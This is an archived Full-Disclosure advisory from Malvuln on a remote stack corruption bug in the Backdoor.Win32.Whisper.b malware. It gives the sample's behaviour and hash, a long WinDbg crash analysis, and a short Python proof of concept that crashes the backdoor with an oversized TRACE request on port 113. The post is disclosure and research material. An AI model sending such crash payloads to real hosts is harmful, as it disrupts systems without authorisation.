lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAAHK0WTNk1C3uTeNDudHtVHJa-093g0dL0nr4o6ZXDTst7LVuw@mail.gmail.com>
Date: Tue, 19 Jan 2021 23:46:35 -0500
From: malvuln <malvuln13@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Backdoor.Win32.Whisper.b / Remote Stack Corruption

Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source:
https://malvuln.com/advisory/a0edb91f62c8c083ec35b32a922168d1.txt
Contact: malvuln13@...il.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Whisper.b
Vulnerability: Remote Stack Corruption
Description: Whisper.b listens on TCP port 113 and connects to port
6667, deletes itself drops executable named rundll32.exe in
Windows\System dir. The malware is prone to stack corruption issues
when receiving unexpected characters of random sizes.
Type: PE32
MD5: a0edb91f62c8c083ec35b32a922168d1
Vuln ID: MVID-2021-0039
Dropped files: rundll32.exe
ASLR: False
DEP: False
Safe SEH: True
Disclosure: 01/19/2021

Memory Dump:
(1afc.1284): Access violation - code c0000005 (first/second chance not
available)
eax=00000000 ebx=00000000 ecx=e026bf39 edx=00000000 esi=00000003 edi=00000003
eip=773ced3c esp=04a4f65c ebp=04a4f7ec iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
ntdll!ZwWaitForMultipleObjects+0xc:
773ced3c c21400          ret     14h


0:005> !analyze -v
*******************************************************************************
*                                                                             *
*                        Exception Analysis                                   *
*                                                                             *
*******************************************************************************

*** WARNING: Unable to verify checksum for rundll32.exe
*** ERROR: Module load completed but symbols could not be loaded for
rundll32.exe
Failed calling InternetOpenUrl, GLE=12029

FAULTING_IP:
+2f
e48240ad ??              ???

EXCEPTION_RECORD:  ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: e48240ad
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000000
   Parameter[1]: e48240ad
Attempt to read from address e48240ad

PROCESS_NAME:  rundll32.exe

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced
memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p
referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_PARAMETER1:  00000000

EXCEPTION_PARAMETER2:  e48240ad

READ_ADDRESS:  e48240ad

FOLLOWUP_IP:
ntdll!__RtlUserThreadStart+2f
773c4a77 e988ed0300      jmp     ntdll!__RtlUserThreadStart+0x3edbc (77403804)

FAILED_INSTRUCTION_ADDRESS:
+2f
e48240ad ??              ???

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG:  0

APPLICATION_VERIFIER_FLAGS:  0

LAST_CONTROL_TRANSFER:  from 773c4a77 to e48240ad

FAULTING_THREAD:  ffffffff

BUGCHECK_STR:  APPLICATION_FAULT_BAD_INSTRUCTION_PTR_INVALID_POINTER_READ_EXPLOITABLE_STACK_CORRUPTION

PRIMARY_PROBLEM_CLASS:  BAD_INSTRUCTION_PTR_EXPLOITABLE

DEFAULT_BUCKET_ID:  BAD_INSTRUCTION_PTR_EXPLOITABLE

IP_ON_HEAP:  e48240ad
The fault address in not in any loaded module, please check your build's rebase
log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may
contain the address if it were loaded.

STACK_TEXT:
WARNING: Frame IP not in any known module. Following frames may be wrong.
04a4ff94 773c4a77 00000000 3af22017 00000000 0xe48240ad
736e6e20 cd614028 41d249d6 3dfc3391 92dff545 ntdll!__RtlUserThreadStart+0x2f
736e6e24 41d249d6 3dfc3391 92dff545 cd55d73c 0xcd614028
736e6e28 3dfc3391 92dff545 cd55d73c 4f5ef4ed 0x41d249d6
736e6e2c 92dff545 cd55d73c 4f5ef4ed 81eb06aa 0x3dfc3391
736e6e30 cd55d73c 4f5ef4ed 81eb06aa 7f29e23d 0x92dff545
736e6e34 4f5ef4ed 81eb06aa 7f29e23d cd551d8d 0xcd55d73c
736e6e38 81eb06aa 7f29e23d cd551d8d 4e19a09f 0x4f5ef4ed
736e6e3c 7f29e23d cd551d8d 4e19a09f 860534a8 0x81eb06aa
736e6e40 cd551d8d 4e19a09f 860534a8 fba5b239 0x7f29e23d
736e6e44 4e19a09f 860534a8 fba5b239 cd4e1429 0xcd551d8d
736e6e48 860534a8 fba5b239 cd4e1429 42473b1b 0x4e19a09f
736e6e4c fba5b239 cd4e1429 42473b1b f6b1c781 0x860534a8
736e6e50 cd4e1429 42473b1b f6b1c781 10d3e67d 0xfba5b239
736e6e54 42473b1b f6b1c781 10d3e67d cd3fa923 0xcd4e1429
736e6e58 f6b1c781 10d3e67d cd3fa923 46667fd6 0x42473b1b
736e6e5c 10d3e67d cd3fa923 46667fd6 4a9e6faa 0xf6b1c781
736e6e60 cd3fa923 46667fd6 4a9e6faa a4020484 0x10d3e67d
736e6e64 46667fd6 4a9e6faa a4020484 cd3306f1 0xcd3fa923
736e6e68 4a9e6faa a4020484 cd3306f1 47da0c2e 0x46667fd6
736e6e6c a4020484 cd3306f1 47da0c2e e555a9a4 0x4a9e6faa
736e6e70 cd3306f1 47da0c2e e555a9a4 05adc8fa 0xa4020484
736e6e74 47da0c2e e555a9a4 05adc8fa cd317e1a 0xcd3306f1
736e6e78 e555a9a4 05adc8fa cd317e1a 40e92213 0x47da0c2e
736e6e7c 05adc8fa cd317e1a 40e92213 19029ab0 0xe555a9a4
736e6e80 cd317e1a 40e92213 19029ab0 bae1e59b 0x5adc8fa
736e6e84 40e92213 19029ab0 bae1e59b cd277ed0 0xcd317e1a
736e6e88 19029ab0 bae1e59b cd277ed0 4f3b741b 0x40e92213
736e6e8c bae1e59b cd277ed0 4f3b741b bf22908d 0x19029ab0
736e6e90 cd277ed0 4f3b741b bf22908d 3b2b3d24 0xbae1e59b
736e6e94 4f3b741b bf22908d 3b2b3d24 cd17f8c4 0xcd277ed0
736e6e98 bf22908d 3b2b3d24 cd17f8c4 46fe8509 0x4f3b741b
736e6e9c 3b2b3d24 cd17f8c4 46fe8509 254058a4 0xbf22908d
736e6ea0 cd17f8c4 46fe8509 254058a4 3001decb 0x3b2b3d24
736e6ea4 46fe8509 254058a4 3001decb cd145a4e 0xcd17f8c4
736e6ea8 254058a4 3001decb cd145a4e 4324c135 0x46fe8509
736e6eac 3001decb cd145a4e 4324c135 e69f8e92 0x254058a4
736e6eb0 cd145a4e 4324c135 e69f8e92 b345abf4 0x3001decb
736e6eb4 4324c135 e69f8e92 b345abf4 cd11fbdc 0xcd145a4e
736e6eb8 e69f8e92 b345abf4 cd11fbdc 4b1f854b 0x4324c135
736e6ebc b345abf4 cd11fbdc 4b1f854b 6ad3aa94 0xe69f8e92
736e6ec0 cd11fbdc 4b1f854b 6ad3aa94 3c872390 0xb345abf4
736e6ec4 4b1f854b 6ad3aa94 3c872390 cd112693 0xcd11fbdc
736e6ec8 6ad3aa94 3c872390 cd112693 419dc5c2 0x4b1f854b
736e6ecc 3c872390 cd112693 419dc5c2 c5b98ea4 0x6ad3aa94
736e6ed0 cd112693 419dc5c2 c5b98ea4 a8a2743f 0x3c872390
736e6ed4 419dc5c2 c5b98ea4 a8a2743f cd043531 0xcd112693
736e6ed8 c5b98ea4 a8a2743f cd043531 4153c0d3 0x419dc5c2
736e6edc a8a2743f cd043531 4153c0d3 595b94bc 0xc5b98ea4
736e6ee0 cd043531 4153c0d3 595b94bc 5f42c9f4 0xa8a2743f
736e6ee4 4153c0d3 595b94bc 5f42c9f4 ccd78f11 0xcd043531
736e6ee8 595b94bc 5f42c9f4 ccd78f11 4f523611 0x4153c0d3
736e6eec 5f42c9f4 ccd78f11 4f523611 19c5fc80 0x595b94bc
736e6ef0 ccd78f11 4f523611 19c5fc80 7d50770a 0x5f42c9f4
736e6ef4 4f523611 19c5fc80 7d50770a ccd1e29b 0xccd78f11
736e6ef8 19c5fc80 7d50770a ccd1e29b 4cf3723e 0x4f523611
736e6efc 7d50770a ccd1e29b 4cf3723e 5793579e 0x19c5fc80
736e6f00 ccd1e29b 4cf3723e 5793579e 6b53dd4c 0x7d50770a
736e6f04 4cf3723e 5793579e 6b53dd4c cccbe7ef 0xccd1e29b
736e6f08 5793579e 6b53dd4c cccbe7ef 4b50c5a2 0x4cf3723e
736e6f0c 6b53dd4c cccbe7ef 4b50c5a2 da8387bb 0x5793579e
736e6f10 cccbe7ef 4b50c5a2 da8387bb 8405031f 0x6b53dd4c
736e6f14 4b50c5a2 da8387bb 8405031f ccc2f326 0xcccbe7ef
736e6f18 da8387bb 8405031f ccc2f326 47ed903b 0x4b50c5a2
736e6f1c 8405031f ccc2f326 47ed903b bdc41090 0xda8387bb
736e6f20 ccc2f326 47ed903b bdc41090 b419ea3e 0x8405031f
736e6f24 47ed903b bdc41090 b419ea3e ccc200e6 0xccc2f326
736e6f28 bdc41090 b419ea3e ccc200e6 42c4b62a 0x47ed903b
736e6f2c b419ea3e ccc200e6 42c4b62a fae8138c 0xbdc41090
736e6f30 ccc200e6 42c4b62a fae8138c c13f8cfb 0xb419ea3e
736e6f34 42c4b62a fae8138c c13f8cfb ccc1f553 0xccc200e6
736e6f38 fae8138c c13f8cfb ccc1f553 4f394841 0x42c4b62a
736e6f3c c13f8cfb ccc1f553 4f394841 7449f9a3 0xfae8138c
736e6f40 ccc1f553 4f394841 7449f9a3 e01900f9 0xc13f8cfb
736e6f44 4f394841 7449f9a3 e01900f9 ccc1dc5b 0xccc1f553
736e6f48 7449f9a3 e01900f9 ccc1dc5b 43bc0790 0x4f394841
736e6f4c e01900f9 ccc1dc5b 43bc0790 c8f17d9a 0x7449f9a3
736e6f50 ccc1dc5b 43bc0790 c8f17d9a d621268e 0xe01900f9
736e6f54 43bc0790 c8f17d9a d621268e ccc05de9 0xccc1dc5b
736e6f58 c8f17d9a d621268e ccc05de9 4628d666 0x43bc0790
736e6f5c d621268e ccc05de9 4628d666 26640782 0xc8f17d9a
736e6f60 ccc05de9 4628d666 26640782 869a8aeb 0xd621268e
736e6f64 4628d666 26640782 869a8aeb ccae28bc 0xccc05de9
736e6f68 26640782 869a8aeb ccae28bc 4e9d874c 0x4628d666
736e6f6c 869a8aeb ccae28bc 4e9d874c 18bfb3a4 0x26640782
736e6f70 ccae28bc 4e9d874c 18bfb3a4 4b6a2c12 0x869a8aeb
736e6f74 4e9d874c 18bfb3a4 4b6a2c12 ccac7724 0xccae28bc
736e6f78 18bfb3a4 4b6a2c12 ccac7724 404b732a 0x4e9d874c
736e6f7c 4b6a2c12 ccac7724 404b732a e34e7e97 0x18bfb3a4
736e6f80 ccac7724 404b732a e34e7e97 b347d056 0x4b6a2c12
736e6f84 404b732a e34e7e97 b347d056 ccac4ba9 0xccac7724
736e6f88 e34e7e97 b347d056 ccac4ba9 4d608700 0x404b732a
736e6f8c b347d056 ccac4ba9 4d608700 45d74286 0xe34e7e97
736e6f90 ccac4ba9 4d608700 45d74286 b6a77b95 0xb347d056
736e6f94 4d608700 45d74286 b6a77b95 cca03606 0xccac4ba9
736e6f98 45d74286 b6a77b95 cca03606 41766646 0x4d608700
736e6f9c b6a77b95 cca03606 41766646 b3f90cb2 0x45d74286
736e6fa0 cca03606 41766646 b3f90cb2 2f8f31ea 0xb6a77b95
736e6fa4 41766646 b3f90cb2 2f8f31ea cc9882c1 0xcca03606
736e6fa8 b3f90cb2 2f8f31ea cc9882c1 42897b24 0x41766646
736e6fac 2f8f31ea cc9882c1 42897b24 6a0028a1 0xb3f90cb2
736e6fb0 cc9882c1 42897b24 6a0028a1 46c8b036 0x2f8f31ea
736e6fb4 42897b24 6a0028a1 46c8b036 cc858d44 0xcc9882c1
736e6fb8 6a0028a1 46c8b036 cc858d44 4af581c3 0x42897b24
736e6fbc 46c8b036 cc858d44 4af581c3 faecc28f 0x6a0028a1
736e6fc0 cc858d44 4af581c3 faecc28f e9aecb98 0x46c8b036
736e6fc4 4af581c3 faecc28f e9aecb98 cc6f2aa6 0xcc858d44
736e6fc8 faecc28f e9aecb98 cc6f2aa6 4638c91c 0x4af581c3
736e6fcc e9aecb98 cc6f2aa6 4638c91c 1ef4e9a4 0xfaecc28f
736e6fd0 cc6f2aa6 4638c91c 1ef4e9a4 385e8c97 0xe9aecb98
736e6fd4 4638c91c 1ef4e9a4 385e8c97 cc6b27e2 0xcc6f2aa6
736e6fd8 1ef4e9a4 385e8c97 cc6b27e2 4fc68b92 0x4638c91c
736e6fdc 385e8c97 cc6b27e2 4fc68b92 29ba23b6 0x1ef4e9a4
736e6fe0 cc6b27e2 4fc68b92 29ba23b6 27b5127f 0x385e8c97
736e6fe4 4fc68b92 29ba23b6 27b5127f cc5f236c 0xcc6b27e2
736e6fe8 29ba23b6 27b5127f cc5f236c 4144a4f9 0x4fc68b92
736e6fec 27b5127f cc5f236c 4144a4f9 07085388 0x29ba23b6
736e6ff0 cc5f236c 4144a4f9 07085388 55d02d18 0x27b5127f
736e6ff4 4144a4f9 07085388 55d02d18 cc5d04d0 0xcc5f236c
736e6ff8 07085388 55d02d18 cc5d04d0 46030552 0x4144a4f9
736e6ffc 55d02d18 cc5d04d0 46030552 c3a32f81 0x7085388
736e7000 cc5d04d0 46030552 c3a32f81 30c4b360 0x55d02d18
736e7004 46030552 c3a32f81 30c4b360 cc4f0483 0xcc5d04d0
736e7008 c3a32f81 30c4b360 cc4f0483 4dcdc0cd 0x46030552
736e700c 30c4b360 cc4f0483 4dcdc0cd 6cdf1088 0xc3a32f81
736e7010 cc4f0483 4dcdc0cd 6cdf1088 fe776960 0x30c4b360
736e7014 4dcdc0cd 6cdf1088 fe776960 cc3c15b2 0xcc4f0483
736e7018 6cdf1088 fe776960 cc3c15b2 4f95c8c0 0x4dcdc0cd
736e701c fe776960 cc3c15b2 4f95c8c0 bbba8594 0x6cdf1088
736e7020 cc3c15b2 4f95c8c0 bbba8594 8caad0c1 0xfe776960
736e7024 4f95c8c0 bbba8594 8caad0c1 cc35a746 0xcc3c15b2
736e7028 bbba8594 8caad0c1 cc35a746 4673bb90 0x4f95c8c0
736e702c 8caad0c1 cc35a746 4673bb90 e10286a2 0xbbba8594
736e7030 cc35a746 4673bb90 e10286a2 1bde9afc 0x8caad0c1
736e7034 4673bb90 e10286a2 1bde9afc cc2ab78b 0xcc35a746
736e7038 e10286a2 1bde9afc cc2ab78b 43587097 0x4673bb90
736e703c 1bde9afc cc2ab78b 43587097 b417bbaa 0xe10286a2
736e7040 cc2ab78b 43587097 b417bbaa 9aa02c69 0x1bde9afc
736e7044 43587097 b417bbaa 9aa02c69 cc26c33f 0xcc2ab78b
736e7048 b417bbaa 9aa02c69 cc26c33f 41163379 0x43587097
736e704c 9aa02c69 cc26c33f 41163379 b856f991 0xb417bbaa
736e7050 cc26c33f 41163379 b856f991 34dbfe2b 0x9aa02c69
736e7054 41163379 b856f991 34dbfe2b cc20997b 0xcc26c33f
736e7058 b856f991 34dbfe2b cc20997b 470c37e8 0x41163379
736e705c 34dbfe2b cc20997b 470c37e8 d3eada87 0xb856f991
736e7060 cc20997b 470c37e8 d3eada87 439845b5 0x34dbfe2b
736e7064 470c37e8 d3eada87 439845b5 cc18eff2 0xcc20997b
736e7068 d3eada87 439845b5 cc18eff2 490f0bcc 0x470c37e8
736e706c 439845b5 cc18eff2 490f0bcc 9b5bf8ab 0xd3eada87
736e7070 cc18eff2 490f0bcc 9b5bf8ab a3fe95de 0x439845b5
736e7074 490f0bcc 9b5bf8ab a3fe95de cc135cdc 0xcc18eff2
736e7078 9b5bf8ab a3fe95de cc135cdc 45d4e588 0x490f0bcc
736e707c a3fe95de cc135cdc 45d4e588 6c919999 0x9b5bf8ab
736e7080 cc135cdc 45d4e588 6c919999 6c4993e7 0xa3fe95de
736e7084 45d4e588 6c919999 6c4993e7 cc11a7bc 0xcc135cdc
736e7088 6c919999 6c4993e7 cc11a7bc 45990818 0x45d4e588
736e708c 6c4993e7 cc11a7bc 45990818 9681eb87 0x6c919999
736e7090 cc11a7bc 45990818 9681eb87 c6be3f94 0x6c4993e7
736e7094 45990818 9681eb87 c6be3f94 cc0abbe7 0xcc11a7bc
736e7098 9681eb87 c6be3f94 cc0abbe7 4bec1d7f 0x45990818
736e709c c6be3f94 cc0abbe7 4bec1d7f 55110b83 0x9681eb87
736e70a0 cc0abbe7 4bec1d7f 55110b83 b153a1d6 0xc6be3f94
736e70a4 4bec1d7f 55110b83 b153a1d6 cc0988d1 0xcc0abbe7
736e70a8 55110b83 b153a1d6 cc0988d1 4a6b9dc9 0x4bec1d7f
736e70ac b153a1d6 cc0988d1 4a6b9dc9 ab2668be 0x55110b83
736e70b0 cc0988d1 4a6b9dc9 ab2668be 2492399f 0xb153a1d6
736e70b4 4a6b9dc9 ab2668be 2492399f cc07c3fa 0xcc0988d1
736e70b8 ab2668be 2492399f cc07c3fa 4510d5d6 0x4a6b9dc9
736e70bc 2492399f cc07c3fa 4510d5d6 fff52c96 0xab2668be
736e70c0 cc07c3fa 4510d5d6 fff52c96 6bc8d4ae 0x2492399f
736e70c4 4510d5d6 fff52c96 6bc8d4ae cc04b07d 0xcc07c3fa
736e70c8 fff52c96 6bc8d4ae cc04b07d 4b8d7df8 0x4510d5d6
736e70cc 6bc8d4ae cc04b07d 4b8d7df8 e7c036a9 0xfff52c96
736e70d0 cc04b07d 4b8d7df8 e7c036a9 bc145b66 0x6bc8d4ae
736e70d4 4b8d7df8 e7c036a9 bc145b66 cbf31bd1 0xcc04b07d
736e70d8 e7c036a9 bc145b66 cbf31bd1 4a6adeee 0x4b8d7df8
736e70dc bc145b66 cbf31bd1 4a6adeee 4896058e 0xe7c036a9
736e70e0 cbf31bd1 4a6adeee 4896058e 1dbe9ad9 0xbc145b66
736e70e4 4a6adeee 4896058e 1dbe9ad9 cbf26a30 0xcbf31bd1
736e70e8 4896058e 1dbe9ad9 cbf26a30 496fa9ba 0x4a6adeee
736e70ec 1dbe9ad9 cbf26a30 496fa9ba 00e61295 0x4896058e
736e70f0 cbf26a30 496fa9ba 00e61295 b4192c41 0x1dbe9ad9
736e70f4 496fa9ba 00e61295 b4192c41 cbee4159 0xcbf26a30
736e70f8 00e61295 b4192c41 cbee4159 4764294f 0x496fa9ba
736e70fc b4192c41 cbee4159 4764294f 1d0087ae 0xe61295
736e7100 cbee4159 4764294f 1d0087ae 37abef46 0xb4192c41
736e7104 4764294f 1d0087ae 37abef46 cbc0abbe 0xcbee4159
736e7108 1d0087ae 37abef46 cbc0abbe 46e4d0ca 0x4764294f
736e710c 37abef46 cbc0abbe 46e4d0ca 0f15eb88 0x1d0087ae
736e7110 cbc0abbe 46e4d0ca 0f15eb88 e53ce83f 0x37abef46
736e7114 46e4d0ca 0f15eb88 e53ce83f cbbabedb 0xcbc0abbe
736e7118 0f15eb88 e53ce83f cbbabedb 4efd1c66 0x46e4d0ca
736e711c e53ce83f cbbabedb 4efd1c66 273adabe 0xf15eb88
736e7120 cbbabedb 4efd1c66 273adabe 6a052189 0xe53ce83f
736e7124 4efd1c66 273adabe 6a052189 cbb4f0fd 0xcbbabedb
736e7128 273adabe 6a052189 cbb4f0fd 481edf94 0x4efd1c66
736e712c 6a052189 cbb4f0fd 481edf94 dbd7e990 0x273adabe
736e7130 cbb4f0fd 481edf94 dbd7e990 23a5fe43 0x6a052189
736e7134 481edf94 dbd7e990 23a5fe43 cbb436b0 0xcbb4f0fd
736e7138 dbd7e990 23a5fe43 cbb436b0 43728ab9 0x481edf94
736e713c 23a5fe43 cbb436b0 43728ab9 0f33358b 0xdbd7e990
736e7140 cbb436b0 43728ab9 0f33358b 865e9c98 0x23a5fe43
736e7144 43728ab9 0f33358b 865e9c98 cbb051b3 0xcbb436b0
736e7148 0f33358b 865e9c98 cbb051b3 454f9567 0x43728ab9
736e714c 865e9c98 cbb051b3 454f9567 8be331ba 0xf33358b
736e7150 cbb051b3 454f9567 8be331ba 5f16c90a 0x865e9c98
736e7154 454f9567 8be331ba 5f16c90a cbb00f6b 0xcbb051b3
736e7158 8be331ba 5f16c90a cbb00f6b 4431f230 0x454f9567
736e715c 5f16c90a cbb00f6b 4431f230 7c92388c 0x8be331ba
736e7160 cbb00f6b 4431f230 7c92388c 0580fc6c 0x5f16c90a
736e7164 4431f230 7c92388c 0580fc6c cba8ca0f 0xcbb00f6b
736e7168 7c92388c 0580fc6c cba8ca0f 4494269a 0x4431f230
736e716c 0580fc6c cba8ca0f 4494269a 64005cb9 0x7c92388c
736e7170 cba8ca0f 4494269a 64005cb9 141d3536 0x580fc6c
736e7174 4494269a 64005cb9 141d3536 cb9ef1fc 0xcba8ca0f
736e7178 64005cb9 141d3536 cb9ef1fc 46761702 0x4494269a
736e717c 141d3536 cb9ef1fc 46761702 2d7b6687 0x64005cb9
736e7180 cb9ef1fc 46761702 2d7b6687 2c

STACK_COMMAND:  ~5s; .ecxr ; kb

SYMBOL_STACK_INDEX:  1

SYMBOL_NAME:  ntdll!__RtlUserThreadStart+2f

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: ntdll

IMAGE_NAME:  ntdll.dll

DEBUG_FLR_IMAGE_TIMESTAMP:  3a21d961

FAILURE_BUCKET_ID:
BAD_INSTRUCTION_PTR_EXPLOITABLE_c0000005_ntdll.dll!__RtlUserThreadStart

BUCKET_ID:  APPLICATION_FAULT_BAD_INSTRUCTION_PTR_INVALID_POINTER_READ_EXPLOITABLE_STACK_CORRUPTION_BAD_IP_ntdll!__RtlUserThreadStart+2f


Exploit/PoC:
from socket import *

MALWARE_HOST="x.x.x.x"
PORT=113

def doit():
    s=socket(AF_INET, SOCK_STREAM)
    s.connect((MALWARE_HOST, PORT))

    PACKIT="TRACE /"+"A"*69666+" HTTP/1.1\r\nHost: "+"B"*32000+"\r\n\r\n"
    s.send(PACKIT)
    s.close()

    print("Backdoor.Win32.Whisper.b / Remote Stack Corruption")
    print("MD5: a0edb91f62c8c083ec35b32a922168d1")
    print("By Malvuln");

if __name__=="__main__":
    doit()


Disclaimer: The information contained within this advisory is supplied
"as-is" with no warranties or guarantees of fitness of use or
otherwise. Permission is hereby granted for the redistribution of this
advisory, provided that it is not altered except by reformatting it,
and that due credit is given. Permission is explicitly given for
insertion in vulnerability databases and similar, provided that due
credit is given to the author. The author is not responsible for any
misuse of the information contained herein and accepts no
responsibility for any damage caused by the use or misuse of this
information. The author prohibits any malicious use of security
related information or exploits by the author or elsewhere. Do not
attempt to download Malware samples. The author of this website takes
no responsibility for any kind of damages occurring from improper
Malware handling or the downloading of ANY Malware mentioned on this
website or elsewhere. All content Copyright (c) Malvuln.com (TM).

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ